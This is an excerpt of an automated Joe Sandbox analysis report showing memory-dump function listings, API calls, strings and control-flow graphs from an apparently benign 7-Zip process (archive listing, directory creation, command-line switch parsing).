                                                                                                                                                                                                        • Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_b50000_7z.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: fputcfputsfree
                                                                                                                                                                                                        • String ID: Alternate Streams Size: $Alternate Streams: $Archives with Errors: $Archives with Warnings: $Archives: $Can't open as archive: $Compressed: $ERROR:$Files: $Folders: $OK archives: $Open Errors: $Scanning the drive for archives:$Size: $Warnings:
                                                                                                                                                                                                        • API String ID: 2822829076-727241755
                                                                                                                                                                                                        • Opcode ID: 76881a621ad82756a4bf301af10dc41923f0376f2db4c6d33a7aae10c23e2ed1
                                                                                                                                                                                                        • Instruction ID: 128998d84da24ed3a875707b358db03065cc9d0f8fdc3ee7e8d933ad7237a070
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 76881a621ad82756a4bf301af10dc41923f0376f2db4c6d33a7aae10c23e2ed1
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5D22293230AAC195DE34EB25E8913EEB3E0F786B80F4441A6DA9E43B19DF38C559C745

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                        control_flow_graph 2649 b7a180-b7a1e9 GetProcAddress * 2 2650 b7a214-b7a22a GetProcAddress 2649->2650 2651 b7a1eb-b7a1fe GetProcAddress 2649->2651 2652 b7a233-b7a23e 2650->2652 2654 b7a22c-b7a22e 2650->2654 2651->2652 2653 b7a200-b7a20d 2651->2653 2656 b7a244-b7a2f0 call b53208 call b78928 2652->2656 2657 b7a729 2652->2657 2653->2652 2660 b7a20f 2653->2660 2655 b7a72b-b7a73e 2654->2655 2664 b7a2f6-b7a30a 2656->2664 2665 b7a648 2656->2665 2657->2655 2660->2655 2667 b7a31c-b7a321 2664->2667 2668 b7a30c-b7a31a 2664->2668 2666 b7a718-b7a727 call b794a8 2665->2666 2666->2655 2671 b7a328-b7a32b 2667->2671 2668->2671 2673 b7a32d-b7a345 call b5ae2c call b794a8 2671->2673 2674 b7a34a-b7a350 2671->2674 2692 b7a634-b7a63d 2673->2692 2676 b7a352-b7a36a call b5ae2c call b794a8 2674->2676 2677 b7a36f-b7a37d SysStringByteLen 2674->2677 2676->2692 2679 b7a383-b7a3e3 call b5ae2c * 2 call b53208 * 2 call b78928 2677->2679 2680 b7a64d-b7a65d call b5ae2c 2677->2680 2701 b7a662-b7a678 free * 2 2679->2701 2702 b7a3e9-b7a40c call b78928 2679->2702 2680->2666 2692->2656 2694 b7a643 2692->2694 2694->2657 2701->2666 2705 b7a412-b7a485 call b79d98 call b787a8 call b78860 2702->2705 2706 b7a67d-b7a693 free * 2 2702->2706 2713 b7a48b-b7a49c 2705->2713 2714 b7a698-b7a6ae free * 2 2705->2714 2706->2666 2715 b7a4ee-b7a51b call b79380 2713->2715 2716 b7a49e-b7a4a5 2713->2716 2714->2666 2721 b7a521-b7a526 2715->2721 2722 b7a6b0-b7a6d1 free * 3 2715->2722 2718 b7a4ab-b7a4d9 call b787a8 2716->2718 2726 b7a4e5-b7a4ec 2718->2726 2727 b7a4db-b7a4de 2718->2727 2724 b7a541-b7a564 call b79380 2721->2724 2725 b7a528-b7a53f call b798d4 2721->2725 2722->2666 2733 b7a6d3-b7a6f4 free * 3 2724->2733 2734 b7a56a-b7a57e call b7a034 2724->2734 2732 b7a583-b7a5b7 call b78860 2725->2732 2726->2715 2726->2718 2727->2726 2738 b7a6f6-b7a715 free * 3 2732->2738 2739 b7a5bd-b7a5c0 2732->2739 2733->2666 2734->2732 2738->2666 2740 b7a5c2-b7a5ca 2739->2740 2741 b7a5cf-b7a5e4 call b52130 2739->2741 2740->2741 2744 b7a5e6-b7a5f1 call b79af0 2741->2744 2745 b7a5f8 2741->2745 2748 b7a5f6 2744->2748 2747 b7a5fb-b7a62f call b5b8f0 free * 3 call b794a8 2745->2747 2747->2692 2748->2747
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_b50000_7z.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: AddressProc
                                                                                                                                                                                                        • String ID: GetHandlerProperty$GetHandlerProperty2$GetIsArc$GetNumberOfFormats
                                                                                                                                                                                                        • API String ID: 190572456-3984264347
                                                                                                                                                                                                        • Opcode ID: 73fef0eb24d6ff44d8697e840df78f3fac1608cd30a242a31fa2bdb042e46f71
                                                                                                                                                                                                        • Instruction ID: dbed1fab5b6ad21c6aa3cc4e92c5809d71cec653410b5398f9ed5ecb836607a4
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 73fef0eb24d6ff44d8697e840df78f3fac1608cd30a242a31fa2bdb042e46f71
                                                                                                                                                                                                        • Instruction Fuzzy Hash: A4D1843231AAC086CA60EB21E89079EB3E4F7C6B80F4055A1EA9E57B19DF7CC545CB01

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                        control_flow_graph 2752 b570c8-b570e4 call b57d4c 2754 b570e9-b570ec 2752->2754 2755 b570ee-b570f0 2754->2755 2756 b570f9-b57103 call b59d84 2754->2756 2755->2756 2757 b570f2-b570f4 2755->2757 2761 b57105-b57107 2756->2761 2762 b5710c-b57136 call b59ed8 call b53274 call b5376c 2756->2762 2759 b57449-b57458 2757->2759 2761->2759 2769 b57138-b57141 2762->2769 2770 b5715b-b57175 call b53314 2762->2770 2769->2770 2771 b57143-b57145 2769->2771 2777 b5717a-b57186 call b5a170 2770->2777 2773 b57147 2771->2773 2774 b5714c-b57155 2771->2774 2776 b573f1-b573fe free 2773->2776 2774->2770 2776->2759 2780 b57188-b57195 CreateDirectoryW 2777->2780 2781 b571aa-b571ac 2777->2781 2782 b57360-b57364 2780->2782 2783 b5719b-b571a4 GetLastError 2780->2783 2784 b571b2-b571d2 call b53208 call b5a7ec 2781->2784 2785 b5727d-b57286 GetLastError 2781->2785 2786 b57366-b57379 call b59ab0 2782->2786 2787 b573c9-b573e1 free * 2 2782->2787 2783->2781 2783->2785 2805 b57273-b57278 free 2784->2805 2806 b571d8-b571e7 CreateDirectoryW 2784->2806 2789 b572e4-b572ed GetLastError 2785->2789 2790 b57288-b572b5 call b57d28 call b53208 call b57ebc 2785->2790 2802 b57381 2786->2802 2803 b5737b-b5737f 2786->2803 2787->2759 2793 b573e3-b573ee free 2789->2793 2794 b572f3-b57301 call b5376c 2789->2794 2827 b572b7-b572c4 free 2790->2827 2828 b572c6-b572db free 2790->2828 2793->2776 2809 b57307-b57309 2794->2809 2810 b57432-b57447 free * 2 2794->2810 2808 b57385-b573a3 call b53460 call b56c84 2802->2808 2803->2808 2805->2785 2811 b57356-b5735b free 2806->2811 2812 b571ed-b571f6 GetLastError 2806->2812 2834 b573a5-b573a9 2808->2834 2835 b573ad-b573c4 free * 2 2808->2835 2809->2810 2815 b5730f-b57316 2809->2815 2810->2759 2811->2782 2816 b57207-b57230 call b57d28 call b53208 call b57ebc 2812->2816 2817 b571f8-b57202 free 2812->2817 2820 b5732c-b57332 2815->2820 2821 b57318-b5731c 2815->2821 2841 b57232-b5724a free * 2 2816->2841 2842 b5724f-b57271 free * 2 2816->2842 2817->2789 2824 b57419-b57430 free * 2 2820->2824 2825 b57338-b5733c 2820->2825 2822 b57400-b57417 free * 2 2821->2822 2823 b57322-b57326 2821->2823 2822->2759 2823->2820 2823->2822 2824->2759 2825->2777 2830 b57342-b57351 2825->2830 2827->2789 2832 b572e0-b572e2 2828->2832 2830->2777 2832->2782 2832->2789 2834->2786 2837 b573ab 2834->2837 2835->2759 2837->2787 2841->2789 2842->2832
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                          • Part of subcall function 00B57D4C: GetFileAttributesW.KERNELBASE ref: 00B57D6E
                                                                                                                                                                                                          • Part of subcall function 00B57D4C: GetFileAttributesW.KERNEL32 ref: 00B57DA5
                                                                                                                                                                                                          • Part of subcall function 00B57D4C: free.MSVCRT ref: 00B57DB2
                                                                                                                                                                                                        • free.MSVCRT ref: 00B573F6
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_b50000_7z.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: AttributesFilefree
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 1936811914-0
                                                                                                                                                                                                        • Opcode ID: 2b197326d930c81739ce0310d85795b3f658fd51b37e5abb9d2da20ad921631d
                                                                                                                                                                                                        • Instruction ID: 506d9e5543645c89238895f3a9227f7ecf053b182de704897ee48fac1e76780a
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 2b197326d930c81739ce0310d85795b3f658fd51b37e5abb9d2da20ad921631d
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4481822235D94182CA20EF21F45136E63E1FBC6796F4411E2EF8E93665DF29C94E8B40

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                        control_flow_graph 2843 b57ebc-b57ee3 call b59b68 2846 b57ee9-b57f26 call b5339c call b59ce4 2843->2846 2847 b57fca-b57fd6 call b59ddc 2843->2847 2859 b57f8c-b57fa4 call b591dc 2846->2859 2860 b57f28-b57f2c 2846->2860 2853 b58253-b5828a call b59d0c call b59b30 2847->2853 2854 b57fdc-b57fe4 2847->2854 2870 b58306-b5830b 2853->2870 2871 b5828c-b58294 2853->2871 2854->2853 2857 b57fea-b5800c call b53274 * 2 2854->2857 2880 b5800e-b58017 2857->2880 2881 b5801b-b58020 2857->2881 2874 b57fa6 2859->2874 2875 b57fa8-b57fac 2859->2875 2860->2859 2863 b57f2e-b57f77 call b5abb0 2860->2863 2863->2859 2879 b57f79-b57f87 2863->2879 2876 b5830d-b58312 2870->2876 2877 b58318-b5831c 2870->2877 2871->2870 2878 b58296-b582a5 call b57d4c 2871->2878 2882 b57fb9-b57fc5 call b589d8 2874->2882 2883 b57fb6 2875->2883 2884 b57fae-b57fb3 2875->2884 2876->2877 2885 b584f2-b58500 call b57978 2876->2885 2887 b58377-b58381 call b59c80 2877->2887 2888 b5831e-b58330 call b57d4c 2877->2888 2878->2885 2904 b582ab-b582b2 2878->2904 2890 b58519-b58524 2879->2890 2880->2881 2891 b58040-b5804c call b53670 2881->2891 2892 b58022-b5803e call b52880 2881->2892 2882->2890 2883->2882 2884->2883 2905 b58505-b58506 2885->2905 2887->2885 2908 b58387-b58396 2887->2908 2888->2885 2907 b58336-b5833d 2888->2907 2901 b58051-b58062 call b59ce4 2891->2901 2892->2891 2892->2901 2916 b58064-b58067 2901->2916 2917 b580b1-b580bb call b57ebc 2901->2917 2904->2885 2909 b582b8-b582eb call b5339c 2904->2909 2910 b58509-b58511 call b5794c 2905->2910 2907->2885 2912 b58343-b58372 2907->2912 2908->2885 2913 b5839c-b583a6 call b59ab0 2908->2913 2924 b582ed-b582f8 2909->2924 2925 b582fc-b58301 2909->2925 2920 b58516 2910->2920 2912->2910 2913->2885 2931 b583ac-b583c2 call b53274 2913->2931 2921 b58075-b580a3 2916->2921 2922 b58069-b5806c 2916->2922 2930 b580c1-b58108 call b53314 call b53208 call b57ce0 2917->2930 2933 b5823e-b5824e free * 2 2917->2933 2920->2890 2929 b580a5-b580af call b53404 2921->2929 2921->2930 2922->2917 2928 b5806e-b58073 2922->2928 2924->2925 2925->2910 2928->2917 2928->2921 2929->2930 2953 b5815a-b58185 free * 2 call b5794c free 2930->2953 2954 b5810a-b58111 2930->2954 2939 b583c4-b583ce call b52fec 2931->2939 2940 b583d2-b583f2 2931->2940 2933->2853 2939->2940 2944 b583f4-b583fe call b52fec 2940->2944 2945 b58402-b58437 call b57978 2940->2945 2944->2945 2955 b58484-b5849d call b57d4c 2945->2955 2956 b58439-b58457 wcscmp 2945->2956 2968 b5822d-b58239 free 2953->2968 2959 b58113-b58124 call b52748 2954->2959 2960 b5818a-b581c1 SetLastError free * 2 call b5794c free 2954->2960 2969 b584b3-b584f0 call b5339c free 2955->2969 2970 b5849f-b584a1 2955->2970 2961 b5847c 2956->2961 2962 b58459-b58477 call b5339c free 2956->2962 2977 b581c3-b581ca 2959->2977 2978 b5812a-b58158 free call b53208 call b57ce0 2959->2978 2960->2968 2961->2955 2962->2910 2968->2890 2969->2910 2974 b584a7-b584b1 free 2970->2974 2975 b584a3-b584a5 2970->2975 2974->2885 2975->2969 2975->2974 2979 b581e0-b5822a call b5362c free * 2 call b5794c free 2977->2979 2980 b581cc-b581d1 2977->2980 2978->2953 2978->2954 2979->2968 2980->2979 2983 b581d3-b581dc 2980->2983 2983->2979
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • free.MSVCRT ref: 00B5812F
                                                                                                                                                                                                        • free.MSVCRT ref: 00B5816A
                                                                                                                                                                                                        • free.MSVCRT ref: 00B5817F
                                                                                                                                                                                                        • free.MSVCRT ref: 00B58232
                                                                                                                                                                                                          • Part of subcall function 00B5ABB0: GetModuleHandleW.KERNEL32 ref: 00B5ABD1
                                                                                                                                                                                                          • Part of subcall function 00B5ABB0: GetProcAddress.KERNEL32 ref: 00B5ABE1
                                                                                                                                                                                                          • Part of subcall function 00B5ABB0: GetDiskFreeSpaceW.KERNEL32 ref: 00B5AC32
                                                                                                                                                                                                        • SetLastError.KERNEL32 ref: 00B5818F
                                                                                                                                                                                                        • free.MSVCRT ref: 00B5819B
                                                                                                                                                                                                        • free.MSVCRT ref: 00B581A6
                                                                                                                                                                                                        • free.MSVCRT ref: 00B581BB
                                                                                                                                                                                                        • free.MSVCRT ref: 00B58243
                                                                                                                                                                                                        • free.MSVCRT ref: 00B5824E
                                                                                                                                                                                                        • free.MSVCRT ref: 00B5815F
                                                                                                                                                                                                          • Part of subcall function 00B5339C: free.MSVCRT ref: 00B533D7
                                                                                                                                                                                                          • Part of subcall function 00B5339C: memmove.MSVCRT(00000000,?,?,00000000,00B510A8), ref: 00B533F2
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_b50000_7z.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: free$AddressDiskErrorFreeHandleLastModuleProcSpacememmove
                                                                                                                                                                                                        • String ID: :$:$DATA$\
                                                                                                                                                                                                        • API String ID: 4130059181-1004618218
                                                                                                                                                                                                        • Opcode ID: 7d47eded2622c94f0ddccb54c994b41fb8cf36bc1bcc716852e6415c4a0d71d6
                                                                                                                                                                                                        • Instruction ID: cf94793543f665fc6d44f29e933a432ed35c2e975029c20b5bb4cb87c7c5a33a
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7d47eded2622c94f0ddccb54c994b41fb8cf36bc1bcc716852e6415c4a0d71d6
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1C028E33609680D6CB20EF25E49036EB7A0F795791F4042E6EB8E97B68DF34C569CB44

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                        control_flow_graph 2991 b93e84-b93eb5 2992 b941e8 2991->2992 2993 b93ebb 2991->2993 2994 b941ea-b941fd 2992->2994 2995 b93ebe-b93efa fputs call b92e24 2993->2995 2998 b93efc-b93f03 2995->2998 2999 b93f51-b93f59 2995->2999 3000 b93f1f-b93f4c call b53274 call b930cc free 2998->3000 3001 b93f05-b93f1d fputs call b52300 2998->3001 3002 b93f5b-b93f62 2999->3002 3003 b93f64-b93f6f 2999->3003 3000->2999 3001->2999 3006 b93f73-b93f9e call b92e24 call b93148 3002->3006 3003->3006 3015 b93fa0-b93fce fputs * 2 call b52640 call b52300 3006->3015 3016 b93fd3-b93fe3 call b93034 3006->3016 3015->3016 3020 b93fe8-b93fea 3016->3020 3020->2994 3022 b93ff0-b93ff7 3020->3022 3023 b93ff9-b94027 fputs * 2 call b526a0 call b52300 3022->3023 3024 b9402c-b9403c 3022->3024 3023->3024 3024->2994 3028 b94042-b94048 3024->3028 3030 b9404a-b94079 3028->3030 3031 b940af-b940b9 3028->3031 3036 b941b9 3030->3036 3037 b9407f-b94096 call b93034 3030->3037 3032 b9419d-b941b1 3031->3032 3033 b940bf-b940e0 fputs 3031->3033 3032->2995 3035 b941b7 3032->3035 3033->3032 3041 b940e6-b940fc 3033->3041 3035->2992 3040 b941bd-b941ca SysFreeString 3036->3040 3044 b941bb 3037->3044 3045 b9409c-b940ad SysFreeString 3037->3045 3040->2994 3041->3032 3043 b94102-b94133 3041->3043 3047 b94139-b94162 3043->3047 3048 b941cc 3043->3048 3044->3040 3045->3030 3045->3031 3051 b941ce-b941d8 call b5ae2c 3047->3051 3052 b94164-b94197 call b92ecc call b5ae2c SysFreeString 3047->3052 3049 b941d9-b941e6 SysFreeString 3048->3049 3049->2994 3051->3049 3052->3032 3052->3043
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_b50000_7z.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: fputs$FreeString$fputcfree
                                                                                                                                                                                                        • String ID: = $--$----$Path$Type$Warning: The archive is open with offset
                                                                                                                                                                                                        • API String ID: 2701146716-1919703766
                                                                                                                                                                                                        • Opcode ID: 98949995720aafeada5ab4e649821211fbe2246f847a42084f07584e6b56428e
                                                                                                                                                                                                        • Instruction ID: 49b54220ee092c085280092ceeaf87a2ed83eb24d059ae4491913fbfee9e5ba8
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 98949995720aafeada5ab4e649821211fbe2246f847a42084f07584e6b56428e
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1C915836314A8592DF10DF22E95476E77A0F795BC4F0051A2EF5A97B28DF38C94AC700

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                        control_flow_graph 3059 b5f71c-b5f74e call b51610 3062 b5f774-b5f7c2 _isatty * 3 3059->3062 3063 b5f750-b5f773 call b702a0 _CxxThrowException 3059->3063 3064 b5f7d4 3062->3064 3065 b5f7c4-b5f7c8 3062->3065 3063->3062 3068 b5f7d9-b5f81c 3064->3068 3065->3064 3067 b5f7ca-b5f7ce 3065->3067 3067->3064 3070 b5f7d0-b5f7d2 3067->3070 3071 b5f81e-b5f822 3068->3071 3072 b5f82a 3068->3072 3070->3068 3071->3072 3073 b5f824-b5f828 3071->3073 3074 b5f830-b5f834 3072->3074 3073->3072 3073->3074 3075 b5f836 3074->3075 3076 b5f83c-b5f846 3074->3076 3075->3076 3077 b5f854-b5f85e 3076->3077 3078 b5f848-b5f84e 3076->3078 3079 b5f860-b5f866 3077->3079 3080 b5f86c-b5f876 3077->3080 3078->3077 3079->3080 3081 b5f884-b5f88e 3080->3081 3082 b5f878-b5f87e 3080->3082 3083 b5f890-b5f89d 3081->3083 3084 b5f8f3-b5f8fd 3081->3084 3082->3081 3085 b5f89f-b5f8a9 3083->3085 3086 b5f8ab-b5f8be call b5ed34 3083->3086 3087 b5f8ff-b5f917 3084->3087 3088 b5f91a-b5f931 call b5ac74 * 2 3084->3088 3085->3084 3094 b5f8e6-b5f8ed 3086->3094 3095 b5f8c0-b5f8e5 call b702a0 _CxxThrowException 3086->3095 3087->3088 3096 b5f936-b5f940 3088->3096 3094->3084 3095->3094 3098 b5f946-b5f95c 3096->3098 3099 b5f9dd-b5f9e7 3096->3099 3101 b5f965-b5f977 wcscmp 3098->3101 3102 b5f95e-b5f963 3098->3102 3103 b5fa94-b5fa9c 3099->3103 3104 b5f9ed-b5f9fa 3099->3104 3105 b5f9bb-b5f9c2 call b5ad0c 3101->3105 3106 b5f979-b5f98c call b5ed34 3101->3106 3102->3105 3104->3103 3107 b5fa00-b5fa1c call b52bc8 call b52d34 3104->3107 3105->3099 3117 b5f9c4-b5f9d7 call b9d4c0 call b5ac74 3105->3117 3114 b5f9b4 3106->3114 3115 b5f98e-b5f9b3 call b702a0 _CxxThrowException 3106->3115 3123 b5fa4f-b5fa74 call b702a0 _CxxThrowException 3107->3123 3124 b5fa1e-b5fa3b call b53f78 3107->3124 3114->3105 3115->3114 3117->3099 3131 b5fa75-b5fa8f GetCurrentProcess SetProcessAffinityMask free 3123->3131 3132 b5fa3d-b5fa46 3124->3132 3133 b5fa49-b5fa4d 3124->3133 3131->3103 3132->3133 3133->3123 3133->3131
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        • Unsupported switch postfix for -slp, xrefs: 00B5F991
                                                                                                                                                                                                        • SeRestorePrivilege, xrefs: 00B5F91C
                                                                                                                                                                                                        • Unsupported switch postfix -bb, xrefs: 00B5F8C3
                                                                                                                                                                                                        • SeCreateSymbolicLinkPrivilege, xrefs: 00B5F92A
                                                                                                                                                                                                        • SeLockMemoryPrivilege, xrefs: 00B5F9CB
                                                                                                                                                                                                        • Unsupported switch postfix -stm, xrefs: 00B5FA52
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_b50000_7z.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: ExceptionThrowfree$_isatty$Process$AffinityCurrentMaskwcscmp
                                                                                                                                                                                                        • String ID: SeCreateSymbolicLinkPrivilege$SeLockMemoryPrivilege$SeRestorePrivilege$Unsupported switch postfix -bb$Unsupported switch postfix -stm$Unsupported switch postfix for -slp
                                                                                                                                                                                                        • API String ID: 1961088698-2328792591
                                                                                                                                                                                                        • Opcode ID: c2f4b7cbffa4da8aa62650c82c274732c1406b7f11731e234dbbf7887eb3a42e
                                                                                                                                                                                                        • Instruction ID: 9dc94220775f5a80a9ee87e3d7ba42c3cfe96d53057883bfd840e14c77fa5098
                                                                                                                                                                                                        • Opcode Fuzzy Hash: c2f4b7cbffa4da8aa62650c82c274732c1406b7f11731e234dbbf7887eb3a42e
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 21A19F73608AC5DAEB11DF24D4903AC7FA0E396B94F5881F6DB8C47725CB64C989C710

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                        control_flow_graph 3134 b9a448-b9a455 3135 b9a49c-b9a4a4 3134->3135 3136 b9a457-b9a45f 3134->3136 3137 b9a4f4 3135->3137 3138 b9a4a6-b9a4a9 3135->3138 3136->3135 3139 b9a461-b9a495 call b52300 fputs call b526a0 call b52300 3136->3139 3142 b9a4fc-b9a50a 3137->3142 3140 b9a4ab-b9a4da call b52300 fputs call b526a0 call b52300 3138->3140 3141 b9a4df-b9a4e5 3138->3141 3139->3135 3140->3141 3141->3142 3144 b9a53d-b9a559 free 3142->3144 3145 b9a50c 3142->3145 3150 b9a55b 3144->3150 3151 b9a58c-b9a5b5 free 3144->3151 3148 b9a510-b9a526 3145->3148 3153 b9a538-b9a53b 3148->3153 3154 b9a528-b9a533 free * 2 3148->3154 3156 b9a55f-b9a575 3150->3156 3163 b9a5c5-b9a5c8 3151->3163 3164 b9a5b7-b9a5be 3151->3164 3153->3144 3153->3148 3154->3153 3160 b9a587-b9a58a 3156->3160 3161 b9a577-b9a582 free * 2 3156->3161 3160->3151 3160->3156 3161->3160 3165 b9a5ca-b9a5e6 _CxxThrowException 3163->3165 3166 b9a5e7-b9a603 free 3163->3166 3164->3163 3169 b9a5c0 3164->3169 3165->3166 3170 b9a605 3166->3170 3171 b9a626-b9a637 free call b7a13c 3166->3171 3172 b9a5c0 call b966a8 3169->3172 3173 b9a609-b9a624 free 3170->3173 3175 b9a63c-b9a675 call b97080 call b5182c call b97f50 3171->3175 3172->3163 3173->3171 3173->3173 3182 b9a6a8-b9a6c9 free 3175->3182 3183 b9a677 3175->3183 3185 b9a67b-b9a691 3183->3185 3186 b9a6a3-b9a6a6 3185->3186 3187 b9a693-b9a69e free * 2 3185->3187 3186->3182 3186->3185 3187->3186
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_b50000_7z.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: free$fputs$ExceptionThrowfputc
